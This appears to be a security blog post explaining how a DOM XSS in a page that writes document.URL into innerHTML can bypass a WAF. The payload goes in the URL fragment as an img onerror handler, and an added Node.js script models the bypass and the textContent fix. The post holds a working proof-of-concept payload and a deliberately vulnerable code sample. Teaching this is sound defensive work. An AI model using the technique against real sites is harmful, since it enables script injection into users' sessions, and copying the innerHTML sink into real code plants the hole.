DOM XSS Behind a WAF

Here’s the scenario. It seems obvious in hindsight, but it took me some time to figure out, possibly because I don’t find that many DOM XSS bugs; they are tough to find. Anyway, say you receive the following response.

HTTP/1.1 200 OK
Content-Type: text/html

<html>
<script>
// Reads the full URL (fragment included) and writes it into the page as HTML.
function funcURL() {
   var mDiv = document.getElementById('mid');
   mDiv.innerHTML = document.URL; // DOM XSS sink: document.URL is attacker-controlled
}
window.onload = funcURL;
</script>
<body>
<div id="mid"></div>
</body></html>

An exploit doesn’t get much more straightforward than that. But here’s the catch: the URL is behind a pretty stringent WAF, which rejects any request containing <, > or ' outright. Is this still exploitable? Think about it for a second (hint: it definitely is).

Ok. Done? Have a working exploit?

My first thought was to abuse the fact that the Content-Type is not set to UTF-8. I had no luck with this.

Then I had a duh moment. The fragment (everything after the #) is part of document.URL but is NOT sent to the server, so the WAF never sees it. So that’s the exploit. But there is one more hurdle: innerHTML will not run a <script> tag inserted through it, so that needs to be addressed as well; the payload is not quite as simple as <script>alert(1)</script>, although close. The final URL works:

https://madeupbadURL.html?aaab#<img/src='b'/onerror=alert(1)>
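As an added example, not code from the original post, the following Node.js script models the two sides of what the post describes: the server-side WAF only ever receives the URL up to the #, while document.URL in the browser still carries the fragment that reaches the innerHTML sink. The div object, the WAF rule and the walkthrough function are constructed stand-ins (no real DOM or WAF product is involved); the sample URL is the one from the post.

```javascript
// Added example (not code from the original post). It models, under Node.js,
// why a server-side WAF cannot see a payload carried in the URL fragment, and
// what the sink in the post should have done with the URL instead.
// The element and the WAF rule are constructed stand-ins.

// The URL from the post (the host is made up there as well).
const SAMPLE_URL = "https://madeupbadURL.html?aaab#<img/src='b'/onerror=alert(1)>";

// Everything before the first '#' is what the browser sends on the wire.
// The fragment stays client-side (RFC 3986, section 3.5), so no server-side
// filter, WAF included, can inspect it or log it.
function serverVisiblePart(url) {
  const i = url.indexOf('#');
  return i === -1 ? url : url.slice(0, i);
}

// The fragment, '#' included, that only client-side code (document.URL,
// location.hash) ever sees.
function fragmentPart(url) {
  const i = url.indexOf('#');
  return i === -1 ? '' : url.slice(i);
}

// The WAF rule as the post states it: any request containing <, > or '
// is rejected outright.
function wafRejects(requestPart) {
  return /[<>']/.test(requestPart);
}

// Stand-in for <div id="mid">: records the last string each sink received.
function makeFakeDiv() {
  return { innerHTML: '', textContent: '' };
}

// The post's sink. In a real browser the fragment's markup would be parsed
// as HTML; here we only return the string the parser would have been handed.
function renderUnsafe(div, url) {
  div.innerHTML = url;
  return div.innerHTML;
}

// Escape the five characters that matter in an HTML text context. Written
// here for illustration; in the browser, assigning to textContent (below)
// needs no escaping at all.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// The fix: treat the URL as text. textContent never invokes the HTML parser;
// escapeHtml shows what the equivalent innerHTML assignment would carry.
function renderSafe(div, url) {
  div.textContent = url;
  div.innerHTML = escapeHtml(url);
  return div.innerHTML;
}

// True if a string handed to an HTML sink still contains raw tag delimiters.
function containsMarkup(s) {
  return /[<>]/.test(s);
}

// Walk through the post's scenario step by step.
function walkthrough(url) {
  const onWire = serverVisiblePart(url);
  return {
    onWire,                                      // what the server (and WAF) sees
    wafBlocksRequest: wafRejects(onWire),        // false: nothing suspicious on the wire
    fragment: fragmentPart(url),                 // the payload, never sent
    unsafeSinkHasMarkup: containsMarkup(renderUnsafe(makeFakeDiv(), url)), // true
    safeSinkHasMarkup: containsMarkup(renderSafe(makeFakeDiv(), url)),     // false
  };
}

console.log(walkthrough(SAMPLE_URL));
```

Run it with node and the walkthrough shows the whole story in one object: the request that reaches the server passes the WAF rule, the fragment holding the markup never leaves the browser, and only the innerHTML sink turns it into parsed HTML. For the page in the post the fix is the one-line change from mDiv.innerHTML = document.URL to mDiv.textContent = document.URL; and because the fragment never appears in server logs, finding this class of bug is a matter of reviewing client-side code for sinks fed by document.URL or location, not of tuning the WAF.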
